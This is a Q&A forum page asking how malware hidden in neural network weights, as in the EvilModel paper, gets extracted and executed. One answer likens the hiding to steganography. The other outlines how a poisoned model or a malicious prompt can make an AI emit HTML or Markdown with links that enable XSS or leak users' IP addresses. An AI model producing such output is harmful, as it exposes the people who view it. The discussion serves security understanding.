2

Lately, there has been discussion about malware hidden inside deep neural networks, such as, EvilModel: Hiding Malware Inside of Neural Network Models (pdf).

I understand the hiding part, but I would like to know how that malware is assembled as a runnable program and actually run on the target machine. If a separate program is needed for that, how does that program get into the target machine?

2 Answers 2

2

... how that malware is assembled as a runnable program and actually run on the target machine.

The approach of embedding a malware inside some AI model is similar to steganography, i.e. it is about hiding some information (the malware) inside some other information (image, AI model, ...). There are still additional tools needed to extract the embedded malware out of the model and execute it.

The idea behind such approaches is to provide an innocent looking transport channel. To cite from the paper: "The delivery for commands, payloads, and other components must be conducted covertly and evasively to avoid malware being detected and traced."

0

One example is that some AIs can produce HTML content or Markdown. If the AI can either be trained on malicious data or a system or user prompt is malicious, then the rendered content could contain malicious links, images, or other content based on what elements are allowed.

This could lead to XSS, file download, extraction of user's IP or other information.

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .